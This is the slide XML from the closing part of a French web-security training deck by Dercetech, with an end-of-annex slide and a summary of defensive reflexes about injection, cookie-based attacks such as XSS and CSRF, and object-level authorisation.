          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ANNEXE  ·  fin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1737360" y="2121408"/>
            <a:ext cx="8686800" cy="1051560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Si vous êtes encore là</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1737360" y="3291840"/>
            <a:ext cx="8686800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Les trois jours suffisent. Ça, c’était le cran d’après.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide2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0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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId3"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080"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Formation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488643"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5" name="TextBox 4">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId4"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1671523" y="128016"/>
            <a:ext cx="596188" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Annexe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2267711"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7" name="TextBox 6">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId5"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2450591" y="128016"/>
            <a:ext cx="848563" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Section 7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3299154" y="128016"/>
            <a:ext cx="182880" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>›</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId5"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3482034" y="128016"/>
            <a:ext cx="512063" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Bilan</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="6528816"/>
            <a:ext cx="4389120" cy="219456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Copyright Dercetech SRL 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4846320" y="6528816"/>
            <a:ext cx="4937760" cy="219456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://training.dercetech.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10241280" y="6528816"/>
            <a:ext cx="1280160" cy="219456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>204 / 204</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rounded Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="457200"/>
            <a:ext cx="10908792" cy="5650992"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="1270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603504"/>
            <a:ext cx="10058400" cy="420624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Le réflexe, une phrase</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1115568"/>
            <a:ext cx="1005840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1280160"/>
            <a:ext cx="10058400" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Sans notes :</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1719072"/>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01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="1737360"/>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une donnée qui traverse une trust boundary n’est pas du code — SQL, HTML, shell, template</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="2322576"/>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97280" y="2432304"/>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02</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="2450592"/>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le navigateur envoie le cookie tout seul — XSS, CSRF, tracking, SameSite</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="3035808"/>
            <a:ext cx="9784080" cy="13716"/>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97280" y="3145536"/>
            <a:ext cx="731520" cy="329184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>03</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="3163824"/>
            <a:ext cx="8778240" cy="329184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>être loggé n’est pas avoir le droit sur CET objet — JWT signé, owner_id, schéma d’entrée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